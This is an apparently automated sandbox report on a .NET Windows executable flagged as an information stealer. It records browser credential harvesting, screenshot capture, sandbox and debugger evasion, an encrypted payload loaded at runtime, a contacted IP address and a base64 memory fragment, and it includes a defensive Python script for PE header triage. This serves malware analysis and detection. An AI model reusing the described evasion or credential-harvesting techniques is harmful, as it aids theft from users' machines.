Windows Analysis Report
file.exe

Overview

General Information

Sample Name: file.exe
Analysis ID: 895395
MD5: ccbba2aac1cae3a0bd29cb42203e20b4
SHA1: fc43185094768f22e4857f09cf902e4ab8b1ce57
SHA256: 3cd8941da73295f75980a8c38d92902b378614aabddfb395121cbc1724abce22
Tags: exe

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Found evasive API chain (may stop execution after checking mutex)
.NET source code contains very large strings
Machine Learning detection for sample
Found API chain indicative of sandbox detection
Tries to harvest and steal browser information (history, passwords, etc)
.NET source code contains potential unpacker
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
May sleep (evasive loops) to hinder dynamic analysis
Detected TCP or UDP traffic on non-standard ports
Binary contains a suspicious time stamp
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to detect sandboxes (mouse cursor move detection)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Contains long sleeps (>= 3 min)

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 2376 cmdline: C:\Users\user\Desktop\file.exe MD5: CCBBA2AAC1CAE3A0BD29CB42203E20B4)
    • file.exe (PID: 5608 cmdline: C:\Users\user\Desktop\file.exe MD5: CCBBA2AAC1CAE3A0BD29CB42203E20B4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: file.exe | ReversingLabs: Detection: 37%
Source: file.exe | Virustotal: Detection: 42%
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00401C87 CryptUnprotectData,CryptProtectData
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: WZSG.pdb | source: file.exe
Source: Binary string: WZSG.pdbSHA256d | source: file.exe
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00401000 FindFirstFileW,FindNextFileW,EnterCriticalSection,LeaveCriticalSection
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00401D2F FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00404ABC FindFirstFileW,EnterCriticalSection,LeaveCriticalSection,FindNextFileW
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00404068 FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00403EAA FindFirstFileW,FindNextFileW

Networking

Source: global traffic | TCP traffic: 192.168.2.4:49692 -> 89.238.170.240:2227
Source: unknown | TCP traffic detected without corresponding DNS query: 89.238.170.240 (this line is repeated 50 times in the report; the address is contacted directly and is never resolved through DNS)
Source: file.exe, 00000000.00000003.540784331.000000000597E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://en.wikip
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fontfabrik.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: file.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.com
Source: file.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.comMic
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.coml
Source: file.exe, 00000000.00000003.541494170.0000000005973000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.carterandcone.comsio
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/?
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers8
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designers?
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.com/designersG
Source: file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comceTF
Source: file.exe, 00000000.00000003.555478821.0000000005970000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.como
Source: file.exe, 00000000.00000003.555478821.0000000005970000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.550366748.0000000005973000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561708269.0000000005978000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.fontbureau.comoitu
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.fonts.com
Source: file.exe, 00000000.00000003.541122156.000000000597C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541188088.000000000597C000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
Source: file.exe, 00000000.00000003.541188088.000000000597C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.goodfont.co.kr
Source: file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/-cz
Source: file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/?
Source: file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Sue
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/WebdA
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0-f
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/&
Source: file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/H
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/S
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/l
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/r
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/t-i
Source: file.exe, 00000000.00000003.541870112.0000000005977000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.541824255.0000000005977000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/~
Source: file.exe, 00000000.00000003.546481873.00000000059A4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.monotype.T
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sajatypeworks.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sakkal.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sandoll.co.kr
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.tiro.com
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.typography.netD
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.urwpp.deDPlease
Source: file.exe, 00000000.00000002.561781537.0000000006A82000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
Source: file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas_sfp&command=
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfp
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://search.yahoo.com?fr=crmas_sfpf
Source: file.exe, 00000003.00000002.589808374.00000000097A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.598664454.000000000A54D000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: file.exe, 00000000.00000002.555824287.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00404868 GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetDC,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateDIBSection,SelectObject,BitBlt,DeleteObject,DeleteDC,ReleaseDC

System Summary

Source: file.exe, frmMatHang.cs | Long String: Length: 51642
Source: 0.0.file.exe.6f0000.0.unpack, frmMatHang.cs | Long String: Length: 51642
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe, 00000000.00000000.537841104.00000000006F2000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameWZSG.exeB vs file.exe
Source: file.exe, 00000000.00000002.557276043.0000000002B43000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCreet.dll< vs file.exe
Source: file.exe, 00000000.00000002.561529268.0000000005300000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameCreet.dll< vs file.exe
Source: file.exe, 00000000.00000002.564053142.0000000007300000.00000004.08000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000000.00000002.558620337.0000000003B29000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameTyrone.dll8 vs file.exe
Source: file.exe, 00000000.00000002.555824287.0000000000CCA000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameclr.dllT vs file.exe
Source: file.exe, 00000000.00000002.557276043.0000000002BDF000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameCreet.dll< vs file.exe
Source: file.exe | Binary or memory string: OriginalFilenameWZSG.exeB vs file.exe
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02A9C1D4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02A9E608
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_02A9E618
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_072F0448
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_072F1208
Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: file.exe | ReversingLabs: Detection: 37%
Source: file.exe | Virustotal: Detection: 42%
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\file.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
Source: C:\Users\user\Desktop\file.exe | Mutant created: \Sessions\1\BaseNamedObjects\e9ad4a13-a667-4534-bcfa-4791968c5e00
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
Source: classification engine | Classification label: mal72.spyw.evad.winEXE@3/1@0/1
Source: file.exe, 00000003.00000002.632327918.000000000C818000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.602999334.000000000AA88000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.611827518.000000000B1E7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000003.00000002.615477363.000000000B50F000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: file.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: WZSG.pdb | source: file.exe
Source: Binary string: WZSG.pdbSHA256d | source: file.exe

Data Obfuscation

Source: file.exe, frmMatHang.cs | .Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: 0.0.file.exe.6f0000.0.unpack, frmMatHang.cs | .Net Code: InitializeComponent System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
Source: file.exe | Static PE information: 0xA1B089DF [Sat Dec 18 00:10:07 2055 UTC]
Source: initial sample | Static PE information: section name: .text entropy: 7.48667005978947
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX (this line is repeated 35 times in the report)
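Every finding in this Data Obfuscation block, and the static-PE lines in System Summary, is readable straight out of the PE headers: the COFF TimeDateStamp 0xA1B089DF decodes to a date in 2055, the DllCharacteristics word carries DYNAMIC_BASE, NX_COMPAT, NO_SEH and TERMINAL_SERVER_AWARE, a non-zero IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR marks a managed (.NET) image, and a .text entropy close to 7.5 bits per byte is typical of a .NET loader whose real payload is an encrypted byte array fed to Assembly.Load. The Python below is an added example written for this page; it is neither Joe Sandbox's code nor anything from the sample. It reimplements those checks with the standard library only. Because the analysed file is not available here, build_sample_pe constructs a minimal PE32 test image (not file.exe) that carries the report's timestamp and flags and a .text section whose entropy is exactly 8.0; pass a real path on the command line to triage that file instead. One caveat the report's "suspicious time stamp" signature leaves out: Roslyn's deterministic builds replace the timestamp with a content hash, so a nonsense date on a .NET binary is weak evidence on its own and should be weighed together with the other findings.

```python
"""Static PE triage reproducing four of the report's signatures:
COFF timestamp, DllCharacteristics flags, .NET COM descriptor and
per-section Shannon entropy.  Standard library only."""
import math
import struct
from collections import Counter
from datetime import datetime, timezone

# IMAGE_OPTIONAL_HEADER.DllCharacteristics bits, named as in the report
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}
IMAGE_DIRECTORY_ENTRY_DEBUG = 6
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14   # non-zero RVA => managed (.NET) image
HIGH_ENTROPY = 7.0                          # packed/encrypted code usually sits above this


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def utc_string(ts: int) -> str:
    """Render a COFF TimeDateStamp (seconds since 1970 UTC) as a readable date."""
    return datetime.fromtimestamp(ts, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")


def parse_pe(data: bytes) -> dict:
    """Parse just enough of a PE32/PE32+ image to drive the checks below."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, nsec, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    pe32plus = struct.unpack_from("<H", data, opt)[0] == 0x20B
    # field offsets inside the optional header differ between PE32 and PE32+
    dllchar = struct.unpack_from("<H", data, opt + (0x5E if pe32plus else 0x46))[0]
    nrva_off = opt + (0x6C if pe32plus else 0x5C)
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    dirs = [struct.unpack_from("<II", data, nrva_off + 4 + i * 8) for i in range(nrva)]
    sections = []
    for i in range(nsec):
        s = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + i * 40)
        body = data[s[4]:s[4] + s[3]]             # PointerToRawData, SizeOfRawData
        sections.append({"name": s[0].rstrip(b"\0").decode("ascii", "replace"),
                         "characteristics": s[9], "entropy": shannon_entropy(body)})
    has_dir = lambda i: len(dirs) > i and dirs[i][0] != 0
    return {
        "machine": machine, "timestamp": timestamp,
        "dll_characteristics": [n for bit, n in DLL_CHARACTERISTICS.items() if dllchar & bit],
        "has_debug_dir": has_dir(IMAGE_DIRECTORY_ENTRY_DEBUG),
        "is_dotnet": has_dir(IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR),
        "sections": sections,
    }


def triage(data: bytes, now_ts: int) -> list:
    """Return human-readable findings; now_ts is the analyst's clock in epoch seconds."""
    pe = parse_pe(data)
    findings = []
    if pe["timestamp"] > now_ts:
        findings.append("suspicious time stamp: 0x%08X [%s]" % (pe["timestamp"], utc_string(pe["timestamp"])))
    if pe["is_dotnet"]:
        findings.append(".NET image (IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR present)")
    for s in pe["sections"]:
        if s["entropy"] >= HIGH_ENTROPY:
            findings.append("high-entropy section %s: %.2f" % (s["name"], s["entropy"]))
    return findings


def build_sample_pe(timestamp: int = 0xA1B089DF) -> bytes:
    """CONSTRUCTED minimal PE32 for offline testing; it is not the analysed sample.
    One .text section holding every byte value (entropy exactly 8.0), the report's
    four DllCharacteristics flags, a debug directory and a CLR (COM descriptor) entry."""
    text = bytes(range(256)) * 4
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)               # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 1, timestamp, 0, 0, 96 + 16 * 8, 0x0102)
    dllchar = 0x0040 | 0x0100 | 0x0400 | 0x8000
    opt = struct.pack("<HBB" + "I" * 9 + "H" * 6 + "I" * 4 + "HH" + "I" * 6,
                      0x10B, 14, 0, len(text), 0, 0, 0x1000, 0x1000, 0x2000, 0x400000,
                      0x1000, 0x200, 6, 0, 0, 0, 6, 0, 0, 0x2000, 0x200, 0, 2, dllchar,
                      0x100000, 0x1000, 0x100000, 0x1000, 0, 16)
    dirs = [(0, 0)] * 16
    dirs[IMAGE_DIRECTORY_ENTRY_DEBUG] = (0x2000, 0x1C)
    dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR] = (0x2020, 0x48)
    dirs_blob = b"".join(struct.pack("<II", *d) for d in dirs)
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), 0x200,
                      0, 0, 0, 0, 0x60000020)   # CNT_CODE | MEM_EXECUTE | MEM_READ
    headers = dos + b"PE\0\0" + coff + opt + dirs_blob + sec
    return headers.ljust(0x200, b"\0") + text


if __name__ == "__main__":
    import sys, time
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    for line in triage(blob, int(time.time())):
        print(line)
```

Run without arguments it triages the constructed image and reports the 2055 timestamp, the .NET marker and an 8.00-entropy .text section; with a path it triages that file. The entropy threshold of 7.0 is a convention, not a standard: plain x86 code lands around 6.0 to 6.5, compressed or encrypted data above 7.2, and the report's 7.49 for this sample's .text sits squarely in the second band.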

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: CreateMutex,DecisionNodes,ExitProcess (graph_3-2216)
Source: C:\Users\user\Desktop\file.exe | Sandbox detection routine: GetCursorPos, DecisionNode, Sleep (graph_3-2301)
Source: C:\Users\user\Desktop\file.exe TID: 992 | Thread sleep time: -39697s >= -30000s
Source: C:\Users\user\Desktop\file.exe TID: 5744 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00402192 GetCursorPos,GetCursorPos,Sleep
Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_0040202A GetCurrentHwProfileA,GetSystemInfo,EnumDisplayDevicesA,EnumDisplayDevicesA
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00401000 FindFirstFileW,FindNextFileW,EnterCriticalSection,LeaveCriticalSection
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00401D2F FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00404ABC FindFirstFileW,EnterCriticalSection,LeaveCriticalSection,FindNextFileW
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00404068 FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\file.exe | Code function: 3_2_00403EAA FindFirstFileW,FindNextFileW
Source: C:\Users\user\Desktop\file.exe | Thread delayed: delay time: 39697
Source: file.exe, 00000003.00000002.603157570.000000000AACA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 37GgJtnOltjDD1rt5rxW9o2EIVg+tnl5OLaenKXezPp9aVLed09NTt52bqEut8rMrct3WSdmbi3tiprFYBbtt+fwwCkMv66KkCazedCXWRGy8pdZ4Wziy6wINeTLrGg9yQg9hbSycdR2eFN79Dp/PT42y/8ZH+P/HD9svzO3v7T5SZ5tmL11Kn/J5Jfz8q4vk09nM0O9FfXjQD67aLR09Pk6CpWM9yi/Pz9WMtutmUXDwtfNxZbWalsDY6U2BmU5eh5tZ7xy94TeboKUUY5ISk1qy1qx3DQarSOGVjUXonhhgzFbr+jNKB4R9+J0Q68PjPEPmg3RG1L8sOSIbvG8sOt70gs6qkbl5XK7CaN3xmg4kDoUp6ziOmGMNQO/MUKC/dPib2qWsWHMeuqkZrVkwsBYrdFhrleaplFJHdGaSzOLek1PjbVbJj5NmRXdTZ7CCOeiVOOLuFTy/gmIgzgQXkdUeJIUzJYmMrfJGPSigOHUcDC6ETCE8oGxRuMk1CT8M141yktHtJYm0cQRh0M4ZdbhF347Iz47GMACzBvVagpPp2YbuCs5opcNmnYEz5hMaLmj9QWoC+y/nUT0eNErzqNe4dFmxqCDl3ANI3p40jH45bQJSZhZaehn3PcoUqLZrB1dJnkiiesRX8BPnC7SNJ55C2B1yCeMSgVqVseSgy6eh1blGReXoN/4Cs17Acy54j0rau2kgRodmq0ioocgcNjRVQw+QRds1cbdcvZFvaqjrinY9jpyWOUSRxtmVov7gPB6DEqxiovmOQnjjH6+xYtwxKg4vcFOG7Pwm2yt3oKCjC+CoafPiLkbVrcAppM4K/CBdsyoG9ailH8Q0+l6yQT03XRxuDMm9thoPvTpCMwS7GjMBAMZQROcgzy5j4jzehtoYhbgg/uEiV+haxY0Y5AA3t/eWSokxoWm2a5XjuktGCie5yPQbsKBr3PoLfHgOfk4GNHABPApXYjABIUJlQVeDDAsl1K2C+CUXm+LOU50Dq6ZM0ATVCbqOO3YBGcj0dHhzknOo1FvOXXFKaJiU2MWIBG/LTtFfKuIGxSHYOnjABqgAsHEfu3OrKLnnC7CpAH9CJoEeyY8kAR7ipFJs3VDcHt5Zy0AzvPmk9VEvdFuDYjv5kWm4qr6AaxUEzYcZjPl0mUidilnhGLFYZ3CT0v4A6W4BybOMnyJsXgyZDEBms6nxmAmqFASb2a9cniFd1WShAuTwy4azZ2s7TEdmMYHqp3Q1qriAFImdAb1wPj0LK+XKeiS7aaYX8fxpchpGLJGHWazeezetpfT0VpJr1Q64QgHcMbnwZFQ23TTPL8ycERvYa+v2DGlUmLdRcUa8JvlNv5MnW63qrAoY3MIz4XFdquCuB2O8Saf5uD5XB2XhlSnr7sk3grNdoMQC7oFCiSCM8L5RJ4SH80ehgFST82